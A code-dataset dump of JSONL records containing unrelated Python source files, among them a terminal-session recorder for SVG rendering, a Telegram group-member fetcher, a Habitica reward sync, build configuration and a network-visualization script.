AsciiCastEvent], None, None]\n \"\"\"Record a terminal session in asciicast v2 format\n\n The records returned are of two types:\n - a single header with configuration information\n - multiple event records with data captured from the terminal and timing information\n \"\"\"\n yield AsciiCastHeader(version=2, width=columns, height=lines, theme=theme)\n\n start = None\n for data, time in _record(columns, lines, input_fileno, output_fileno):\n if start is None:\n start = time\n\n yield AsciiCastEvent(time=(time - start).total_seconds(),\n event_type='o',\n event_data=data,\n duration=None)\n\n\ndef _record(columns, lines, input_fileno, output_fileno):\n # type: (int, int, int, int) -> Generator[Tuple[bytes, datetime.datetime], None, int]\n \"\"\"Record raw input and output of a shell session\n\n This function forks the current process. The child process is a shell which is a session\n leader and has a controlling terminal and is run in the background. The parent process, which\n runs in the foreground, transmits data between the standard input, output and the shell\n process and logs it. From the user point of view, it appears they are communicating with\n their shell (through their terminal emulator) when in fact they communicate with our parent\n process which logs all the data exchanged with the shell\n\n The implementation of this method is mostly copied from the pty.spawn function of the\n CPython standard library. 
It has been modified in order to make the record function a\n generator.\n See https://github.com/python/cpython/blob/master/Lib/pty.py\n\n :param columns: Initial number of columns of the terminal\n :param lines: Initial number of lines of the terminal\n :param input_fileno: File descriptor of the input data stream\n :param output_fileno: File descriptor of the output data stream\n \"\"\"\n shell = os.environ.get('SHELL', 'sh')\n\n pid, master_fd = pty.fork()\n if pid == 0:\n # Child process\n os.execlp(shell, shell)\n\n # Set the terminal size for master_fd\n ttysize = struct.pack(\"HHHH\", lines, columns, 0, 0)\n fcntl.ioctl(master_fd, termios.TIOCSWINSZ, ttysize)\n\n # Parent process\n try:\n tty.setraw(input_fileno)\n except tty.error:\n pass\n\n for data, time in _capture_data(input_fileno, output_fileno, master_fd):\n yield data, time\n\n os.close(master_fd)\n\n _, child_exit_status = os.waitpid(pid, 0)\n return child_exit_status\n\n\ndef _capture_data(input_fileno, output_fileno, master_fd, buffer_size=1024):\n # type: (int, int, int, int) -> Generator[bytes, datetime.datetime]\n \"\"\"Send data from input_fileno to master_fd and send data from master_fd to output_fileno and\n also return it to the caller\n\n The implementation of this method is mostly copied from the pty.spawn function of the\n CPython standard library. It has been modified in order to make the record function a\n generator.\n See https://github.com/python/cpython/blob/master/Lib/pty.py\n \"\"\"\n sel = selectors.DefaultSelector()\n sel.register(master_fd, selectors.EVENT_READ)\n sel.register(input_fileno, selectors.EVENT_READ)\n\n while {master_fd, input_fileno} <= set(sel.get_map()):\n events = sel.select()\n for key, _ in events:\n try:\n data = os.read(key.fileobj, buffer_size)\n except OSError:\n sel.unregister(key.fileobj)\n continue\n\n if not data:\n sel.unregister(key.fileobj)\n continue\n\n if key.fileobj == input_fileno:\n write_fileno = master_fd\n else:\n write_fileno = output_fileno\n yield data, datetime.datetime.now()\n\n while data:\n n = os.write(write_fileno, data)\n data = data[n:]\n\n\n# TODO: Fix overwriting\ndef _group_by_time(event_records, min_rec_duration, last_rec_duration):\n # type: (Iterable[AsciiCastEvent], float, float) -> Generator[AsciiCastEvent, None, None]\n \"\"\"Merge event records together if they are close enough and compute the duration between\n consecutive events. 
The duration between two consecutive event records returned by the function\n is guaranteed to be at least min_rec_duration.\n\n :param event_records: Sequence of records in asciicast v2 format\n :param min_rec_duration: Minimum time between two records returned by the function in seconds.\n This helps avoiding 0s duration animations which break SVG animations.\n :param last_rec_duration: Duration of the last record in seconds\n :return: Sequence of records\n \"\"\"\n current_string = b''\n current_time = None\n\n for event_record in event_records:\n if event_record.event_type != 'o':\n continue\n\n if current_time is not None:\n time_between_events = event_record.time - current_time\n if time_between_events >= min_rec_duration:\n accumulator_event = AsciiCastEvent(time=current_time,\n event_type='o',\n event_data=current_string,\n duration=time_between_events)\n yield accumulator_event\n current_string = b''\n current_time = event_record.time\n else:\n current_time = event_record.time\n\n current_string += event_record.event_data\n\n if current_string:\n accumulator_event = AsciiCastEvent(time=current_time,\n event_type='o',\n event_data=current_string,\n duration=last_rec_duration)\n yield accumulator_event\n\n\ndef replay(records, from_pyte_char, theme, min_frame_duration=0.001, last_frame_duration=1):\n # type: (Iterable[Union[AsciiCastHeader, AsciiCastEvent]], Callable[[pyte.screen.Char, Dict[Any, str]], Any], Union[None, AsciiCastTheme], float, float) -> Generator[CharacterCellRecord, None, None]\n \"\"\"Read the records of a terminal sessions, render the corresponding screens and return lines\n of the screen that need updating.\n\n Records are merged together so that there is at least a 'min_frame_duration' seconds pause\n between two rendered screens.\n Lines returned are sorted by time and duration of their appearance on the screen so that lines\n in need of updating at the same time can easily be grouped together.\n The terminal screen is rendered using Pyte and then each character of the screen is converted\n to the caller's format of choice using from_pyte_char\n\n :param records: Records of the terminal session in asciicast v2 format. The first record must\n be a header, which must be followed by event records.\n :param from_pyte_char: Conversion function from pyte.screen.Char to any other format\n :param min_frame_duration: Minimum frame duration in seconds. 
SVG animations break when an\n animation is 0s so setting this to at least 1ms is recommended.\n :param last_frame_duration: Last frame duration in seconds\n :return: Records in the CharacterCellRecord format:\n 1/ a header with configuration information (CharacterCellConfig)\n 2/ one event record for each line of the screen that need to be redrawn (CharacterCellLineEvent)\n \"\"\"\n def sort_by_time(d, row):\n row_line, row_line_time, row_line_duration = d[row]\n return row_line_time + row_line_duration, row\n\n if not isinstance(records, Iterator):\n records = iter(records)\n\n header = next(records)\n screen = pyte.Screen(header.width, header.height)\n stream = pyte.ByteStream(screen)\n\n if theme is not None:\n pass\n elif theme is None and header.theme is not None:\n theme = header.theme\n else:\n raise ValueError('No valid theme')\n\n config = CharacterCellConfig(width=header.width,\n height=header.height,\n text_color=theme.fg,\n background_color=theme.bg)\n yield config\n\n palette = {\n 'foreground': theme.fg,\n 'background': theme.bg\n }\n palette.update(enumerate(theme.palette.split(':')))\n\n pending_lines = {}\n current_time = 0\n last_cursor = None\n for event_record in _group_by_time(records, min_frame_duration, last_frame_duration):\n stream.feed(event_record.event_data)\n\n # Numbers of lines that must be redrawn\n dirty_lines = set(screen.dirty)\n if screen.cursor != last_cursor:\n # Line where the cursor will be drawn\n dirty_lines.add(screen.cursor.y)\n if last_cursor is not None:\n # Line where the cursor will be erased\n dirty_lines.add(last_cursor.y)\n\n redraw_buffer = {}\n for row in dirty_lines:\n redraw_buffer[row] = {}\n for column in screen.buffer[row]:\n redraw_buffer[row][column] = from_pyte_char(screen.buffer[row][column], palette)\n\n if screen.cursor != last_cursor:\n try:\n data = screen.buffer[screen.cursor.y][screen.cursor.x].data\n except KeyError:\n data = ' '\n\n cursor_char = pyte.screens.Char(data=data,\n fg=screen.cursor.attrs.fg,\n bg=screen.cursor.attrs.bg,\n reverse=True)\n redraw_buffer[screen.cursor.y][screen.cursor.x] = from_pyte_char(cursor_char, palette)\n\n last_cursor = copy(screen.cursor)\n screen.dirty.clear()\n\n completed_lines = {}\n # Conversion from seconds to milliseconds\n duration = int(1000 * round(event_record.duration, 3))\n for row in pending_lines:\n line, line_time, line_duration = pending_lines[row]\n if row in redraw_buffer:\n completed_lines[row] = line, line_time, line_duration\n else:\n pending_lines[row] = line, line_time, line_duration + duration\n\n for row in redraw_buffer:\n if redraw_buffer[row]:\n pending_lines[row] = redraw_buffer[row], current_time, duration\n elif row in pending_lines:\n del pending_lines[row]\n\n for row in sorted(completed_lines, key=partial(sort_by_time, completed_lines)):\n args = (row, *completed_lines[row])\n yield CharacterCellLineEvent(*args)\n\n current_time += duration\n\n for row in sorted(pending_lines, key=partial(sort_by_time, pending_lines)):\n args = (row, *pending_lines[row])\n yield CharacterCellLineEvent(*args)\n\n\ndef default_themes():\n # type: ()-> Dict[str, str]\n \"\"\"Return all the default color themes\"\"\"\n pattern = re.compile('base16-(?P.+).Xresources')\n themes = {}\n for file in pkg_resources.resource_listdir(__name__, XRESOURCES_DIR):\n match = pattern.fullmatch(file)\n if match:\n file_path = os.path.join(XRESOURCES_DIR, file)\n xresources_str = pkg_resources.resource_string(__name__, file_path).decode('utf-8')\n themes[match.group('theme_name')] = 
xresources_str\n    return themes\n\n\ndef get_configuration(fileno):\n    # type: (int) -> (int, int, AsciiCastTheme)\n    \"\"\"Get configuration information related to terminal output rendering. If some information can\n    not be gathered from the system, return the default configuration.\n    \"\"\"\n    try:\n        columns, lines = os.get_terminal_size(fileno)\n    except OSError as e:\n        lines = 24\n        columns = 80\n        logger.debug('Failed to get terminal size ({}), using default values '\n                     'instead ({}x{})'.format(e, columns, lines))\n\n    try:\n        xresources_str = _get_xresources()\n    except DisplayError:\n        logger.debug('Failed to gather color information from the Xserver')\n        theme = None\n    else:\n        try:\n            if xresources_str is None:\n                logger.debug('No Xresources string returned')\n                theme = None\n            else:\n                theme = AsciiCastTheme.from_xresources(xresources_str)\n        except ValueError:\n            logger.debug('Invalid Xresources string: \"{}\"'.format(xresources_str))\n            theme = None\n\n    return columns, lines, theme\n\n\ndef _get_xresources():\n    # type: () -> Union[str, None]\n    \"\"\"Query the X server for the Xresources string of the default display\"\"\"\n    d = display.Display()\n    data = d.screen(0).root.get_full_property(Xatom.RESOURCE_MANAGER,\n                                              Xatom.STRING)\n    if data is None:\n        return None\n\n    return data.value.decode('utf-8')","sub_path":"termtosvg/term.py","file_name":"term.py","file_ext":"py","file_size_in_byte":14290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552771795","text":"\n# Entry point for fetching Telegram group member data\n\nimport os\nimport html\nimport json\nimport random\nfrom configparser import ConfigParser\nfrom service_app.model.telegram.src.TelegramChannelMemberExtractor import TGMemExtractor\n\n\ncurpath = os.path.dirname(os.path.realpath(__file__))\n\n\ndef extractor_get_member(username, html_code='0'):\n    status = '0'\n    member_count = 0\n    data_result = ''\n    try:\n        cfg = ConfigParser()\n        telegram_extractor_config_path = os.path.join(curpath, \"./config/telegram_extractor.ini\")\n        cfg.read(telegram_extractor_config_path, encoding='utf-8')\n        tg_session = cfg.get('login_setting', 'tg_session')\n        tg_session_list = tg_session.split('||')\n        # Randomly pick a session\n        tg_session_choice = random.choice(tg_session_list).split(',')\n        tg_session_name = os.path.join(curpath, 'config', tg_session_choice[0] + '.session')\n        TG_api_id = int(tg_session_choice[1])\n        TG_api_hash = tg_session_choice[2]\n        print(tg_session_name)\n        config = {\n            'TG_session_name': tg_session_name,\n            'TG_api_id': TG_api_id,\n            'TG_api_hash': TG_api_hash,\n            'proxy_address': cfg.get('proxy', 'proxy_address'),\n            'proxy_port': int(cfg.get('proxy', 'proxy_port') or 0),\n            'group_member': os.path.join(curpath, cfg.get('download_addr', 'group_member')),\n            'group_avatar': os.path.join(curpath, cfg.get('download_addr', 'group_avatar'))\n        }\n        # print(config)\n        tg_mem_extrator = TGMemExtractor(config)\n        flag = False\n        tg_mem_extrator.set_channel(username)\n        tg_mem_extrator.dump_to_json(flag)\n\n        # Read the result file and return it\n        file_name = username + \".json\"\n        member_file_name = os.path.join(curpath, \"author\", file_name)\n        fl = open(member_file_name, 'r', encoding='utf-8')\n        file_read = fl.read()\n        if len(file_read) > 0:\n            status = '1'\n\n        file_read_json = json.loads(file_read)\n        data_result = file_read_json['data']\n        try:\n            member_count = file_read_json['data']['group_member_count']\n\n        except Exception as e:\n            member_count = 1\n\n        print(member_count)\n\n    except Exception as e:\n        status = str(e)\n        print(e)\n\n    result = {\"status\": status, 
\"agent_type\": \"telegram\", \"fetch_type\": \"get_member\",\n \"data_item_count\": member_count, \"data\": data_result}\n json_result = json.dumps(result, ensure_ascii=False)\n # 为了在线显示图片\n json_result = json_result.replace('/home/kismanager/KIS/Fetch_Agent_Service/service_app',\n '/img')\n\n # 再进行html编码,这样最终flask输出才是合法的json\n html_result = html.escape(json_result)\n # html_code==1是方便浏览器展示字段内容为html的,默认情况返回json格式数据\n if html_code == '1':\n return html_result\n else:\n return json_result\n\n\ndef main():\n username = 'drafts4' # group\n # username = 'tieliu' # channel\n # username = '1306732370'\n result = extractor_get_member(username)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"service_app/model/telegram/get_member.py","file_name":"get_member.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603739810","text":"num_1,num_2=int(input(\"Enter num1:\")),int(input(\"Enter num2:\"))\r\nset_1=set()\r\nset_2=set()\r\nfor i in range(1,num_1):\r\n if(num_1%i==0):\r\n set_1.add(i)\r\nfor i in range(1,num_2):\r\n if(num_2%i==0):\r\n set_2.add(i)\r\nlcm=(num_1*num_2)/max(set_1&set_2)\r\nprint(int(lcm))\r\n\r\n\r\n","sub_path":"Python/Find LCM.py","file_name":"Find LCM.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302989428","text":"# -*- coding: utf-8 -*-\n\n#\n# Author: Tomi Jylhä-Ollila, Finland 2014-2016\n#\n# This file is part of Kunquat.\n#\n# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/\n#\n# To the extent possible under law, Kunquat Affirmers have waived all\n# copyright and related or neighboring rights to Kunquat.\n#\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n\nclass SilenceButton(QToolButton):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self._playback_manager = None\n\n self.setText('Silence')\n self.setToolTip('Silence (Period)')\n self.setAutoRaise(True)\n\n def set_ui_model(self, ui_model):\n self._ui_model = ui_model\n self._playback_manager = ui_model.get_playback_manager()\n\n icon_bank = self._ui_model.get_icon_bank()\n icon_path = icon_bank.get_icon_path('silence')\n icon = QIcon(icon_path)\n self.setIcon(icon)\n\n QObject.connect(self, SIGNAL('clicked()'),\n self._clicked)\n\n def unregister_updaters(self):\n pass\n\n def _clicked(self):\n self._playback_manager.stop_recording()\n self._ui_model.silence()\n\n","sub_path":"kunquat/tracker/ui/views/silencebutton.py","file_name":"silencebutton.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128873795","text":"############################################################################\n# Copyright 2018 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n############################################################################\n# pylint: disable=locally-disabled, invalid-name, missing-docstring\n\n\"\"\"default gcc compiler configuration\n\"\"\"\nfrom parts.config import configuration\n\n\ndef map_default_version(env):\n return env['GCC_VERSION']\n\n\ndef enable_sanitizers(env, recover):\n \"\"\" Enable sanitizers\n Args:\n recover: Enable sanitizers recovery from errors found.\n \"\"\"\n version_minimum = 6\n version_major = int(map_default_version(env).partition('.')[0])\n if version_major >= version_minimum:\n env.AppendUnique(CCFLAGS=[\n '-g',\n '-fsanitize=address,undefined',\n '-fno-sanitize=alignment',\n '-fno-sanitize=shift',\n '-fno-omit-frame-pointer'])\n env.AppendUnique(LINKFLAGS=[\n '-fsanitize=address,undefined'])\n if recover:\n env.AppendUnique(CCFLAGS=[\n '-fsanitize-recover=all',\n '-fsanitize-recover=address'])\n else:\n raise RuntimeError(\n 'Build with sanitizers is only supported for '\n 'GCC version greater than {}'.format(version_minimum))\n\n\ndef post_process_func(env):\n if env.get('sanitizers', False):\n enable_sanitizers(env, env.get('sanitizers_recover', False))\n\n\nconfig = configuration(map_default_version, post_process_func)\n\nconfig.VersionRange(\"*\")\n","sub_path":"parts-site/configurations/base/gcc_posix-any.py","file_name":"gcc_posix-any.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560406216","text":"\n\n#calss header\nclass _URETHRA():\n\tdef __init__(self,): \n\t\tself.name = \"URETHRA\"\n\t\tself.definitions = [u'the tube in most mammals that carries urine from the bladder out of the body. In males it also carries semen.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_urethra.py","file_name":"_urethra.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120978148","text":"# Standard imports\nimport json\nimport requests\nimport logging\nimport arrow\nimport attrdict as ad\n\n# Our imports\nimport emission.core.get_database as edb\nimport emission.net.ext_service.habitica.proxy as proxy\nimport emission.analysis.result.metrics.simple_metrics as earmts\nimport emission.analysis.result.metrics.time_grouping as earmt\n\n\n\ndef reward_active_transportation(user_id):\n logging.debug(\"Entering habitica autocheck for user %s\" % user_id)\n if edb.get_habitica_db().find({'user_id': user_id}).count() == 1:\n logging.debug(\"Habitica user: %s\" % list(edb.get_habitica_db().find({'user_id': user_id})))\n #make sure habits exist\n #bike\n bike_habit = {'type': \"habit\", 'text': \"Bike\", 'up': True, 'down': False, 'priority': 2}\n bike_habit_id = proxy.create_habit(user_id, bike_habit)\n #walk\n walk_habit = {'type': \"habit\", 'text': \"Walk\", 'up': True, 'down': False, 'priority': 2}\n walk_habit_id = proxy.create_habit(user_id, walk_habit)\n\n #get timestamps\n user_val = list(edb.get_habitica_db().find({\"user_id\": user_id}))[0]['metrics_data']\n timestamp_from_db = user_val['last_timestamp']\n timestamp_now = arrow.utcnow().timestamp\n \n #Get metrics\n summary_ts = earmt.group_by_timestamp(user_id, timestamp_from_db, timestamp_now, None, earmts.get_distance)\n logging.debug(\"Metrics response: %s\" % 
summary_ts)\n\n #get distances leftover from last timestamp\n bike_distance = user_val['bike_count']\n walk_distance = user_val['walk_count']\n\n #iterate over summary_ts and look for bike/on foot\n for item in summary_ts:\n try:\n bike_distance += item.BICYCLING\n logging.debug(\"bike_distance += %s\" % item.BICYCLING)\n except AttributeError:\n logging.debug(\"no bike\")\n try:\n walk_distance += item.ON_FOOT\n logging.debug(\"walk_distance += %s\" % item.ON_FOOT)\n except AttributeError:\n logging.debug(\"no Android walk\")\n try:\n walk_distance += item.WALKING\n logging.debug(\"walk_distance += %s\" % item.WALKING)\n except AttributeError:\n logging.debug(\"no ios walk\")\n try:\n walk_distance += item.RUNNING\n logging.debug(\"walk_distance += %s\" % item.RUNNING)\n except AttributeError:\n logging.debug(\"no running\")\n \n logging.debug(\"Finished with bike_distance == %s\" % bike_distance)\n logging.debug(\"Finished with walk_distance == %s\" % walk_distance)\n\n method_uri_walk = \"/api/v3/tasks/\"+ walk_habit_id + \"/score/up\"\n method_uri_bike = \"/api/v3/tasks/\"+ bike_habit_id + \"/score/up\"\n #reward user by scoring + habits\n # Walk: +1 for every km\n walk_pts = int(walk_distance//1000)\n for i in range(walk_pts):\n res = proxy.habiticaProxy(user_id, 'POST', method_uri_walk, None)\n logging.debug(\"Request to score walk points %s\" % res)\n # Bike: +1 for every 3 km\n bike_pts = int(bike_distance//3000)\n for i in range(bike_pts):\n res2 = proxy.habiticaProxy(user_id, 'POST', method_uri_bike, None)\n logging.debug(\"Request to score bike points %s\" % res2)\n\n #update the timestamp and bike/walk counts in db\n edb.get_habitica_db().update({\"user_id\": user_id},{\"$set\": {'metrics_data': {'last_timestamp': arrow.utcnow().timestamp, 'bike_count': bike_distance%3000, 'walk_count': walk_distance%1000}}},upsert=True)\n logging.debug(\"Habitica user after update: %s\" % list(edb.get_habitica_db().find({'user_id': user_id})))\n\n\n\n","sub_path":"emission/net/ext_service/habitica/sync_habitica.py","file_name":"sync_habitica.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599033030","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential, load_model, save_model\nfrom sklearn.metrics import classification_report\nimport os\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom bson import json_util\nimport json\n\nclass Helper:\n\n def __init__(self, train_directory, test_directory, validation_directory = None):\n self.train_directory = train_directory\n self.validation_directory = validation_directory\n self.test_directory = test_directory\n self.model_directory = 'models/'\n self.results_directory = 'results/'\n self.logs_directory = 'logs/cnn-topomap-log-{}'\n self.y_true = []\n\n if not os.path.exists(self.model_directory):\n os.mkdir(self.model_directory)\n\n if not os.path.exists(self.results_directory):\n os.mkdir(self.results_directory)\n\n if not os.path.exists('logs'):\n os.mkdir('logs')\n\n\n def construct_data_generator(self, batch_size=128, validation_split=None, target_size=(224,224), shuffle=False):\n\n datagen = ImageDataGenerator(rescale=1./255, validation_split=validation_split)\n\n train_it = datagen.flow_from_directory(self.train_directory, batch_size=batch_size,\n target_size=target_size, shuffle=shuffle)\n\n test_it = 
datagen.flow_from_directory(self.test_directory, batch_size=batch_size,\n                                              target_size=target_size, shuffle=False)\n\n        self.y_true = test_it.classes\n\n        return train_it, test_it\n\n    def construct_data_generator_w_validation(self, batch_size=128, target_size=(224,224), shuffle=True):\n\n        datagen = ImageDataGenerator(rescale=1./255)\n\n        train_it = datagen.flow_from_directory(self.train_directory, batch_size=batch_size,\n                                               target_size=target_size, shuffle=shuffle)\n\n        validation_it = datagen.flow_from_directory(self.validation_directory, batch_size=batch_size,\n                                                    target_size=target_size, shuffle=shuffle)\n\n        test_it = datagen.flow_from_directory(self.test_directory, batch_size=batch_size,\n                                              target_size=target_size, shuffle=False)\n\n        self.y_true = test_it.classes\n\n        return train_it, validation_it, test_it\n\n    def plot_examples(self, example_type = 'train', classes = [1, 2, 3, 4, 5]):\n        path = ''\n        if example_type == 'train':\n            path = self.train_directory\n        if example_type == 'test':\n            path = self.test_directory\n        if example_type == 'validation':\n            path = self.validation_directory\n\n\n        img_cls_0 = os.listdir(path + str(classes[0]))\n        img_cls_1 = os.listdir(path + str(classes[1]))\n        img_cls_2 = os.listdir(path + str(classes[2]))\n        img_cls_3 = os.listdir(path + str(classes[3]))\n        img_cls_4 = os.listdir(path + str(classes[4]))\n\n        rand_index = np.random.randint(len(img_cls_0))\n\n        img1 = cv2.imread(path + str(classes[0]) + '/' + img_cls_0[rand_index])\n        img2 = cv2.imread(path + str(classes[1]) + '/' + img_cls_1[rand_index])\n        img3 = cv2.imread(path + str(classes[2]) + '/' + img_cls_2[rand_index])\n        img4 = cv2.imread(path + str(classes[3]) + '/' + img_cls_3[rand_index])\n        img5 = cv2.imread(path + str(classes[4]) + '/' + img_cls_4[rand_index])\n\n        print(path + str(classes[0]) + img_cls_0[rand_index])\n        fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(ncols = 5, figsize = (20, 5))\n\n        ax1.imshow(img1)\n        ax2.imshow(img2)\n        ax3.imshow(img3)\n        ax4.imshow(img4)\n        ax5.imshow(img5)\n\n\n\n    def load(self, path):\n        model = load_model(path)\n        return model\n\n    def save(self, model, history, evaluator, y_prob, name):\n        path_model = self.model_directory + name + '.h5'\n        path_results = self.results_directory + name + '.txt'\n\n        save_model(model, path_model)\n        print('model saved, path: {}'.format(path_model))\n\n        y_pred = np.argmax(y_prob, axis=1)\n\n        report = pd.DataFrame(classification_report(self.y_true, y_pred, output_dict=True)).transpose()\n\n        with open(path_results, 'a') as file:\n            model.summary(print_fn = lambda x: file.write(x + '\\n'))\n            result = '{}:{}\\n{}:{}'.format(model.metrics_names[0], evaluator[0], model.metrics_names[1], evaluator[1])\n            file.write(result)\n            file.write('\\n')\n            file.write('trained using {} epochs'.format(len(history.epoch)))\n            file.write('\\n')\n            file.write(report.to_string())\n\n\n    def print_json(self, result):\n        \"\"\"Pretty-print a jsonable structure (e.g.: result).\"\"\"\n        print(json.dumps(\n            result,\n            default=json_util.default, sort_keys=True,\n            indent=4, separators=(',', ': '),\n        ))\n\n\n    def save_json_result(self, model_name, result):\n        \"\"\"Save json to a directory and a filename.\"\"\"\n        result_name = '{}.txt.json'.format(model_name)\n        if not os.path.exists(self.results_directory):\n            os.makedirs(self.results_directory)\n        with open(os.path.join(self.results_directory, result_name), 'w') as f:\n            json.dump(\n                result, f,\n                default=json_util.default, sort_keys=True,\n                indent=4, separators=(',', ': ')\n            )\n\n\n    def load_json_result(self, best_result_name):\n        \"\"\"Load json 
from a path (directory + filename).\"\"\"\n        result_path = os.path.join(self.results_directory, best_result_name)\n        with open(result_path, 'r') as f:\n            return json.JSONDecoder().decode(\n                f.read()\n                # default=json_util.default,\n                # separators=(',', ': ')\n            )\n\n\n    def load_best_hyperspace(self):\n        results = [\n            f for f in list(sorted(os.listdir(self.results_directory))) if 'json' in f\n        ]\n        if len(results) == 0:\n            return None\n\n        best_result_name = results[-1]\n        return self.load_json_result(best_result_name)[\"space\"]\n","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128658153","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom .models import Messages, Comments\n\n\nclass MessagesForm(forms.ModelForm):\n    \n    class Meta:\n        model = Messages\n        exclude = [\n            'date_created',\n        ]\n\n    def clean_title(self):\n        title = self.cleaned_data['title']\n        if len(title) == 0 or len(title) > 20:\n            raise ValidationError('title is invalid')\n        return title\n\n    def clean_message(self):\n        message = self.cleaned_data['message']\n        if len(message) == 0 or len(message) > 200:\n            raise ValidationError('Message is invalid')\n        return message\n\n\nclass CommentsForm(forms.ModelForm):\n    \n    class Meta:\n        model = Comments\n        exclude = [\n            'date_created',\n        ]\n\n    def clean_comment(self):\n        comment = self.cleaned_data['comment']\n        if len(comment) == 0 or len(comment) > 150:\n            raise ValidationError('Comment is invalid')\n        return comment\n    \n    # def save(self, commit=True, messages=None):\n    #     if messages is None:\n    #         raise ValueError('Message was not set')\n    # \n    #     inst = super(CommentsForm, self).save(commit=False)\n    #     inst.delivery = messages\n    #     if commit:\n    #         inst.save()\n    # \n    #     return inst\n\n","sub_path":"Tceh_HW_17/mgs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134810730","text":"#!/usr/bin/env python3\n\"\"\"\nCreates a Dash application that provides 3D visualization of a KINC network.\n\nFor usage instructions run this script with the --help flag.\n\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport igraph as ig\nimport plotly as py\nimport seaborn as sns\nimport plotly.graph_objects as go\nfrom fa2 import ForceAtlas2\nimport random\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport os\nimport json\nimport re\nimport ast\nimport time\nimport base64\nfrom progress.bar import IncrementalBar\nimport socket\n\n\n\n\n\ndef load_network(file_path):\n    \"\"\"\n    Imports the KINC-generated network file (either full or Tidy versions).\n\n    file_path : The path to the network file.\n\n    return : A pandas dataframe containing the network.\n    \"\"\"\n\n    net = pd.read_csv(file_path, sep=\"\\t\")\n\n    # Make sure the file has the required columns\n    columns = net.columns\n    if ('Source' not in columns) | ('Target' not in columns) | ('Samples' not in columns) | ('p_value' not in columns) | ('r_squared' not in columns) |('Test_Name' not in columns):\n        print(\"ERROR: The network file does not seem to be a KINC tidy file. It is missing one or more of the following column headers: Source, Target, Samples, p_value, r_squared or Test_Name. 
Please check the file.\")\n exit(1)\n\n return net\n\n\n\n\n\ndef load_gem(file_path):\n \"\"\"\n Imports the tab-delimited Gene Expression Matrix (GEM) or Metabolite\n\n GEM files can be generated from RNA-seq data using GEMmaker. Alternatively,\n this can be a metabolite abundance matrix.\n\n file_path : The path to the GEM file. The file should be log2 transformed.\n\n return : A pandas dataframe containing the GEM.\n \"\"\"\n\n gem = pd.read_csv(file_path, sep=\"\\t\")\n return gem\n\n\n\n\n\ndef load_amx(file_path, sample_col = 'Sample'):\n \"\"\"\n Imports the tab-delimited annotation matrix (amx).\n\n The matrix must have at least one column that contains a unique list of\n sample names.\n\n file_path : The path to the annotation matrix.\n\n sample_col : The name of the column that contains the sample names. Defaults\n to 'Sample'\n\n return : A pandas dataframe containing the annotation matrix.\n \"\"\"\n amx = pd.read_csv(file_path, sep=\"\\t\")\n amx.index = amx[sample_col]\n return amx\n\n\n\n\n\ndef load_node_meta(file_path):\n \"\"\"\n Imports the tab-delimited node metadata file.\n\n The format of the file must have 4 columns, with the first containing the\n node name, the second a controlled vocabulary term ID, the third the\n term definition and the fourth the vocubulary name.\n \"\"\"\n nmeta = pd.read_csv(file_path, sep=\"\\t\")\n nmeta.columns = ['Node', 'Term', 'Definition', 'Vocabulary']\n nmeta.index = nmeta['Node']\n return nmeta\n\n\n\n\n\ndef get_iGraph(net):\n \"\"\"\n Converts the KINC network dataframe into an iGraph object.\n\n Igraph objects are handly for performing network statistics such as\n transitivity and degree calculations.\n\n net : The network dataframe created by the load_network function.\n\n return : An igraph object of the network loaded with the source, target and\n Similarity_Score (as the weight)\n \"\"\"\n g = ig.Graph()\n\n # Add the nodes\n v = pd.concat([net['Source'], net['Target']]).unique()\n g.add_vertices(v)\n\n # Add the edges\n g.add_edges(net[['Source', 'Target']].values)\n\n # Add the edge w\n #g.es['weight'] = net['Similarity_Score']\n\n return g\n\n\n\n\n\ndef calculate_2d_layout(net, net_prefix, redo_layout, iterations):\n \"\"\"\n Calculates a typical 2D layout for the network.\n\n The first time this function is called on a network it may take some time\n depending on the size of the network. The layout is saved in a file with\n the same name as the network but with a '.glayout.txt' extension in\n the working directory. On subsequent runs of this program that file is\n imported if it exists.\n\n net : The network dataframe created by the load_network function.\n\n net_prefix : The filename of the file that will house the layout\n after it is 